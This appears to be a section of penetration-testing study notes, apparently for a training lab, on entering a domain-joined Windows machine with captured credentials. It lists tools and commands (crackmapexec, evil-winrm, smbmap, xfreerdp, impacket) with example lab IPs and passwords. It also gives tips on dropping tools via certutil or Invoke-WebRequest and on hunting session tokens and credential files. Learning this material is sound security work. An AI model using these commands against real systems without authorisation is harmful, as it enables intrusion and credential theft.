3. Entering a Domain-Joined Machine
Goal: Gain a shell or interactive session on a domain-joined system using captured or guessed credentials.
Objectives
- Use valid credentials to authenticate to a domain-joined machine
- Establish a stable foothold (CLI, shell, remote desktop, etc.)
- Identify the level of access and context of the current session
graph TD
A[Have Valid Credentials] --> B[Find Domain-Joined Targets]
B --> C[Attempt Authentication]
C --> D1[SMB / WinRM / RDP Login]
C --> D2[SQL Auth / Web Panel]
D1 --> E[Command Execution or Shell]
D2 --> E
E --> F[Start Enumeration of Machine & User Context]
| Technique / Protocol |
Tool/Command |
Notes |
SMB Authentication |
crackmapexec smb -u -p
Check access, enumerate shares or users |
Remote Shell (WinRM) |
evil-winrm -i -u -p
Interactive shell with PowerShell support |
RDP |
xfreerdp /v: /u: /p:
GUI session to interact with system |
| MSSQL |
impacket-mssqlclient or PowerUpSQL |
Authenticate to SQL instances for potential command exec |
| Local Enumeration via Shell |
whoami, hostname, ipconfig, net user, etc. |
Initial recon on the target box |
| Shared Folder Access |
smbclient or smbmap |
Browse file shares using authenticated session |
| Domain Enumeration (PowerView) |
Get-Domain*, Get-Net* PowerShell commands |
Confirm machine is domain-joined |
Example: WinRM Shell via
evil-winrm
evil-winrm -i 172.16.5.50 -u damundsen -p 'SQL1234!'
Example: SMB Share Access with
smbmap
smbmap -u forend -p Klmcargo2 -d INLANEFREIGHT.LOCAL -H 172.16.5.5
Pro Tips
- Use crackmapexec --local-auth if you suspect local accounts
- Drop tools via certutil, Invoke-WebRequest, or smbserver
- Verify domain membership with systeminfo or echo %userdomain%
- After connecting, check for session tokens, credential files, and PowerShell logs